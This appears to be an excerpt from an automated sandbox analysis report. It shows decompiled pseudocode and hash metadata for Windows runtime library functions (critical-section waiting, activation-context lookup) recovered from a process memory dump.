Download Yara Rule

C-Code - Quality: 63%

			E01332D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1425350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1427bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E013797C0();
				}
				if( *0x14279c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x14279c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01361624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01357D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E013CFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01379520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0136E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0138DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1426901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1426901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01379980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E013795D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01357D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01357D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E013B7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E013CFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1425350;
							if(_t109 != 0x1425350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E013CFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E013C5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x01332d8a
0x01332d8a
0x01332d92
0x01332d96
0x01332d9e
0x01332da0
0x01332da3
0x01332da5
0x01332da8
0x01332dab
0x01332db2
0x0138f9aa
0x0138f9ab
0x0138f9ae
0x0138f9ae
0x01332db8
0x01332dc2
0x0138f9b9
0x0138f9be
0x0138f9bf
0x0138f9bf
0x01332dcf
0x0138f9c9
0x01332dd5
0x01332dd5
0x01332dd5
0x01332dde
0x01332de1
0x01332e70
0x01332e72
0x01332e72
0x01332de7
0x01332deb
0x01332e7c
0x01332e83
0x01332e85
0x01332e8b
0x01332e8d
0x01332e92
0x01332e92
0x01332e85
0x01332df1
0x01332df7
0x01332df9
0x01332df9
0x01332dfc
0x01332dff
0x01332e02
0x00000000
0x01332e05
0x01332e0c
0x0138f9d9
0x01332e12
0x01332e12
0x01332e12
0x01332e1a
0x0138f9e3
0x0138f9e9
0x0138f9f0
0x0138f9f6
0x0138f9f8
0x0138f9f8
0x0138f9f0
0x01332e23
0x0138fa02
0x0138fa03
0x0138fa05
0x0138fa06
0x00000000
0x01332e29
0x01332e29
0x01332e2e
0x01332e34
0x01332e3e
0x00000000
0x00000000
0x01332e44
0x01332e47
0x01332e4d
0x00000000
0x00000000
0x01332e4f
0x01332e54
0x00000000
0x00000000
0x01332e5a
0x01332e5f
0x01332e9a
0x01332ea4
0x01332ea5
0x01332ea8
0x01332eaf
0x01332eb2
0x01332eb5
0x0138fae9
0x0138faeb
0x0138faed
0x0138faef
0x0138faf7
0x0138faf8
0x0138fafd
0x0138faff
0x0138fb04
0x0138fb04
0x0138faff
0x01332ec0
0x01332ec4
0x01332ec6
0x01332ec8
0x0138fb14
0x0138fb18
0x0138fb1e
0x0138fb21
0x0138fb21
0x01332ece
0x01332ece
0x01332ece
0x01332ed7
0x01332e61
0x01332e63
0x0138fa6b
0x0138fa71
0x0138fa76
0x0138fa78
0x0138fa8a
0x0138fa7a
0x0138fa83
0x0138fa83
0x0138fa8f
0x0138fa91
0x0138fa97
0x0138fa9d
0x0138faa4
0x0138faaa
0x0138faaf
0x0138fab1
0x0138fac3
0x0138fab3
0x0138fabc
0x0138fabc
0x0138fac8
0x0138facb
0x0138fadf
0x0138fadf
0x0138facb
0x0138faa4
0x0138fa91
0x01332e6f
0x01332e6f
0x01332e5f
0x0138fa13
0x0138fa15
0x0138fa17
0x0138fa1f
0x0138fa21
0x0138fa22
0x0138fa25
0x0138fa28
0x0138fa2f
0x0138fa2f
0x0138fa2a
0x0138fa2a
0x0138fa2a
0x0138fa31
0x0138fa34
0x0138fa36
0x0138fa3c
0x0138fa3e
0x0138fa41
0x0138fa43
0x0138fa45
0x0138fa45
0x0138fa41
0x0138fa3c
0x0138fa4a
0x0138fa4f
0x0138fa51
0x0138fa53
0x0138fa56
0x0138fa5b
0x0138fa5e
0x00000000
0x0138fa5e
0x01332e23

Strings

RTL: Re-Waiting, xrefs: 0138FA4A

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 07d6a71acef83b9746e0be8ed793abaa6e2174fc9d02f0f5fef9c2a09540f0ef
Instruction ID: 00cce09db5e4068b123ee3931277b0a0972c977573aebb58132cf5e99a2aec37
Opcode Fuzzy Hash: 07d6a71acef83b9746e0be8ed793abaa6e2174fc9d02f0f5fef9c2a09540f0ef
Instruction Fuzzy Hash: 0D613531A007059FEB32EF6CC844B7FBBA9EB8472CF140269E915972D1C73899408B95

Uniqueness

Uniqueness Score: -1.00%

Function 013352A5, Relevance: 1.4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E013352A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0134EEF0(0x14279a0);
					_t104 =  *0x1428210; // 0xed2ce0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0134EB70(_t93, 0x14279a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01379890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0134EEF0(0x14279a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0134EB70(0, 0x14279a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xed2ced
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0136F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0134EEF0(0x14279a0);
									__eflags =  *0x1428210 - _t104; // 0xed2ce0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1428210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E013B4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0134EB70(_t95, 0x14279a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E013795D0();
											L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E013795D0();
											L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0134EB70(_t93, 0x14279a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E013795D0();
										L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E013795D0();
										L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0136F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x013352a5
0x013352ad
0x013352b0
0x013352b3
0x013352b7
0x013352ba
0x013352bf
0x013352c4
0x013352cc
0x00000000
0x00000000
0x013352ce
0x013352d9
0x013352dd
0x013352e7
0x013352f7
0x013352f9
0x013352fd
0x01390dcf
0x01390dd5
0x01390dd6
0x01390dd7
0x01390dd8
0x01390dd9
0x01390dde
0x01390ddf
0x01390de0
0x01390de1
0x01390de2
0x01390de5
0x01390dea
0x01390dec
0x01390f60
0x01390f64
0x01390f70
0x01390f76
0x01390f79
0x01390f79
0x00000000
0x01390f64
0x01390df2
0x01390df7
0x01390e04
0x01390e0d
0x01390e0d
0x01390e10
0x01390e1a
0x01390e1c
0x01390e4c
0x01390e52
0x01390e61
0x01390e67
0x01390e6b
0x01390e70
0x01390e76
0x01390ed7
0x01390edc
0x01390ee0
0x01390ee6
0x01390eea
0x01390eed
0x01390ef0
0x01390ef3
0x01390ef6
0x01390ef9
0x01390efe
0x01390f01
0x01390f01
0x01390f0b
0x01390f12
0x01390f16
0x01390f18
0x01390f1b
0x01390f2c
0x01390f31
0x01390f31
0x01390f35
0x01390f39
0x01390f3a
0x01390f3c
0x01390f3f
0x01390f50
0x01390f55
0x01390f55
0x01390f59
0x013352eb
0x013352f1
0x013352f1
0x01390e7d
0x01390e84
0x01390e88
0x01390e8a
0x01390e8d
0x01390e9e
0x01390ea3
0x01390ea3
0x01390ea7
0x01390eaf
0x01390eb3
0x01390eb9
0x01390eb9
0x01390ebc
0x01390ecd
0x01390ecd
0x00000000
0x01390eb3
0x01390e21
0x01390e2b
0x01390e2f
0x01390e30
0x01390e3a
0x01390e3f
0x01390e41
0x00000000
0x00000000
0x01390e47
0x00000000
0x01390e47
0x01390df9
0x01390dfe
0x00000000
0x00000000
0x00000000
0x01390dfe
0x01335303
0x01335307
0x00000000
0x01335309
0x00000000
0x01335309
0x01335307
0x013352e9
0x013352e9
0x00000000
0x013352e9
0x0133530e
0x00000000

Strings

,, xrefs: 013352C4, 01390E70, 01390EE0

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: ,
API String ID: 0-4120420056
Opcode ID: f807ba94e40bedbba9d50d8719fa5d4fb5945b091728aa3460784f4e5ea2c7a1
Instruction ID: 7ec3c2d1a9c8df430486c49e10a3aa17d0bf21cac5fc70b2e2cfce4b86383086
Opcode Fuzzy Hash: f807ba94e40bedbba9d50d8719fa5d4fb5945b091728aa3460784f4e5ea2c7a1
Instruction Fuzzy Hash: 8F51FF31205742ABD721DF6CC840B2BBBE8FFA4718F10092EF49987661E774E844C796

Uniqueness

Uniqueness Score: -1.00%

Function 01400EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

`, xrefs: 01400F16

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: f00a19ca678503cf46861c263132e5f06846ba2180a5dec7f3256f5305dfe2cf
Instruction ID: f953aa8a691324ace886aa555dec5e28362668dca3b77cbf235debc6cec7a129
Opcode Fuzzy Hash: f00a19ca678503cf46861c263132e5f06846ba2180a5dec7f3256f5305dfe2cf
Instruction Fuzzy Hash: FD51AFB13043829FD326DF29D980B1BBBE5EBC4754F04092EFA86976A0D670E805C762

Uniqueness

Uniqueness Score: -1.00%

Function 0136F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 0136F124

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 90db96d836c127fbbe851e571ebd8960fed33945fff305adf24f742a68edb10b
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 41518D71504711AFD320DF29C840A6BBBF8FF48758F008A2DFA9597690E7B4E944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013B3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 013B358F

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: cf82fc71fb036c5bf46a3dd250d3ef260da59fb823b61ca3b22a49bf5cec7966
Instruction ID: d85ab2feb165463f6ea077117a4d660104d3b95b9b0f4b4ffdaeb5b5ec969868
Opcode Fuzzy Hash: cf82fc71fb036c5bf46a3dd250d3ef260da59fb823b61ca3b22a49bf5cec7966
Instruction Fuzzy Hash: BF4135B1D0052D9BDB21DA54CCC1FEEB77CAB54728F0045A5EB19AB240EB349E88CF94

Uniqueness

Uniqueness Score: -1.00%

Function 014005AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

`, xrefs: 01400633

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: d7052289e990de52ed158b5d431a7e0beb2e065412480a28bfb73131ae2c2b17
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 773124326003466BE721DE2ACC44F977BDAEBC4794F14463AFA499B2D0D770E904C791

Uniqueness

Uniqueness Score: -1.00%

Function 013B3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 013B38B4

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 9371dc91cd214a759e1dfd703471cc7e72ac652c7ddd9dc95ac09358526d4f21
Instruction ID: 218b6b83c1ab462bc91906e86a31b49bdf40d5d78c841e72dcb2eca00d3ecda6
Opcode Fuzzy Hash: 9371dc91cd214a759e1dfd703471cc7e72ac652c7ddd9dc95ac09358526d4f21
Instruction Fuzzy Hash: EE31E832D0052ABFEB15DA5CC985FBBBB74FF80B28F014169EA15A7650E7309E04C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0136D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 0136D303

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: aace7c7946ba2310f8c7221dd7aec5369dd52a899d3a89e279da71244ff742a6
Instruction ID: 1969971d972e50ec7acc2aa75514ab615b7d59f8bd66955e090b7710eb3398e5
Opcode Fuzzy Hash: aace7c7946ba2310f8c7221dd7aec5369dd52a899d3a89e279da71244ff742a6
Instruction Fuzzy Hash: AF31C2B26083059FC321DF6CC980A6FBBECEB89658F50492EF9D493210D634DD04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01341B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 01341BC5

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 88b556f86fbcda5fd95096aacdcfb4d5bf7391b3d2b788098f23560405ed8281
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 5D210A7690151DABDF229A5DCC80F6BBBEDEF41A58F054425FE048B200D634FC50CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0135F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 0135F73F

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: e25f6b604cf02ef4cd246d37bf47a8905930558ae1b5facf7fb1936960478cfc
Instruction ID: 39b6e54982a5fe9a069b0d1a3acf272209cd7448255273d5e904527fc2cd83b6
Opcode Fuzzy Hash: e25f6b604cf02ef4cd246d37bf47a8905930558ae1b5facf7fb1936960478cfc
Instruction Fuzzy Hash: FE11B2353446068BEBA54E1DC590F36769EEB86EECF24452AED62CB791EB71C8408380

Uniqueness

Uniqueness Score: -1.00%

Function 013E8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Critical error detected %lx, xrefs: 013E8E21

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 970614320c8e19f8d9a5f510c92e18ab621ad705b17f07efa6d158d1944d2d35
Instruction ID: 3d3c159a200218b8b26e149607bea3cbc5cc4a576159b0797db7c82f44b2346e
Opcode Fuzzy Hash: 970614320c8e19f8d9a5f510c92e18ab621ad705b17f07efa6d158d1944d2d35
Instruction Fuzzy Hash: 541135B5D15348DBDF29DFA88909B9CBBB0AB54718F20429EE529AB2D2C3345602CF14

Uniqueness

Uniqueness Score: -1.00%

Function 013CFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 013CFF60

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 89bb6bf0f50376ff9d2dd61999b52ed4703c2e5f964b31d45f90bc8d9ca07fe4
Instruction ID: 2ae285b0a0146cd6b9142984aeda50325fe49423bf189ecf58b6c4a95b4d0aaa
Opcode Fuzzy Hash: 89bb6bf0f50376ff9d2dd61999b52ed4703c2e5f964b31d45f90bc8d9ca07fe4
Instruction Fuzzy Hash: 46110471510245EFDB26EF98CC48F987BB2FF08B18F548058F1045B2A1CB389984DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01405BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bce887931a133fa64a542ed85a193e30490b19f2ee1aa9a74dfcfa57ba2c3b1f
Instruction ID: fc31d0fb8c280fa8cb0326c9e6b4283fd68f31f7a52798882e3f63e034eb1bcf
Opcode Fuzzy Hash: bce887931a133fa64a542ed85a193e30490b19f2ee1aa9a74dfcfa57ba2c3b1f
Instruction Fuzzy Hash: 0C427C71900229CFDB25CF69C880BAABBB1FF45304F1581AAD94DEB392D7349995CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01354120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df1f30a40ba37aebfd523e2827b53bdb2bbbf19ac5611ce2b6e1aafd981813b8
Instruction ID: d88b7311199f141678d32d01de362c9709642b06daad92cf914bc280d09f45ce
Opcode Fuzzy Hash: df1f30a40ba37aebfd523e2827b53bdb2bbbf19ac5611ce2b6e1aafd981813b8
Instruction Fuzzy Hash: 71F18FB06082518FD768CF18C480A7ABBE5FF88B58F14492EF986CB651F734D991CB52

Uniqueness

Uniqueness Score: -1.00%

Function 013620A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e5f07975f78771761e3b7e153ebf6132c97c03e2030337ec2720434938296ae
Instruction ID: 9f36ddc6518fe729e0fc89e457776c85b86a2ea2a7e89348e203d71b25c3d211
Opcode Fuzzy Hash: 0e5f07975f78771761e3b7e153ebf6132c97c03e2030337ec2720434938296ae
Instruction Fuzzy Hash: 27F1E031A083429FE726CF2CC84076B7BE9EB8572CF46C51DE9999B295D734D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0134D5E0, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cf2ae6aafca156149df26db52c741e0d71e832956bb6254c53c5167d8a0ce6
Instruction ID: f26ac5f109bf2b3e0a6f3e63b5e0760a6ee7f8cb574e33345d59d0a622bcec3a
Opcode Fuzzy Hash: 35cf2ae6aafca156149df26db52c741e0d71e832956bb6254c53c5167d8a0ce6
Instruction Fuzzy Hash: BAE1D030A0035ACFEB35CF6CC884BA9BBF6BF5531CF4401A9D909AB695D734A981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0134849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702c9bd286e497d14103486bee2d2a20cff8b1d966cdc0f276d0894cc0d5b364
Instruction ID: 2c2d7e7801402a46f87900bbbf3b328979970bffab908ce3c438432108fd64d5
Opcode Fuzzy Hash: 702c9bd286e497d14103486bee2d2a20cff8b1d966cdc0f276d0894cc0d5b364
Instruction Fuzzy Hash: ABB16970E0020ADFDB25DFE8C980AADBBF9FF58318F10416AE605AB655D774A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0136513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ed1f99ea6c6b1a7e20a1f29a9eeebf9c4c2fa7d25bc825cd1c9f86b8101fca2
Instruction ID: a749f6d3b6136e9a36b040f4e7741438eb5d7a35a77056d4335c9eca5ac74dd5
Opcode Fuzzy Hash: 1ed1f99ea6c6b1a7e20a1f29a9eeebf9c4c2fa7d25bc825cd1c9f86b8101fca2
Instruction Fuzzy Hash: ADC122B55083818FD354CF28C580A5AFBE1FF88308F588A6EF9998B352D775E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 013603E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1020f5c61b5df0671d73b71b7b85d3b62ba2f63e07c2d580faa7a528f1f0914c
Instruction ID: 188f17f69e12186ce8f847665c03afb10aa19e0c89633a4838305427891b6686
Opcode Fuzzy Hash: 1020f5c61b5df0671d73b71b7b85d3b62ba2f63e07c2d580faa7a528f1f0914c
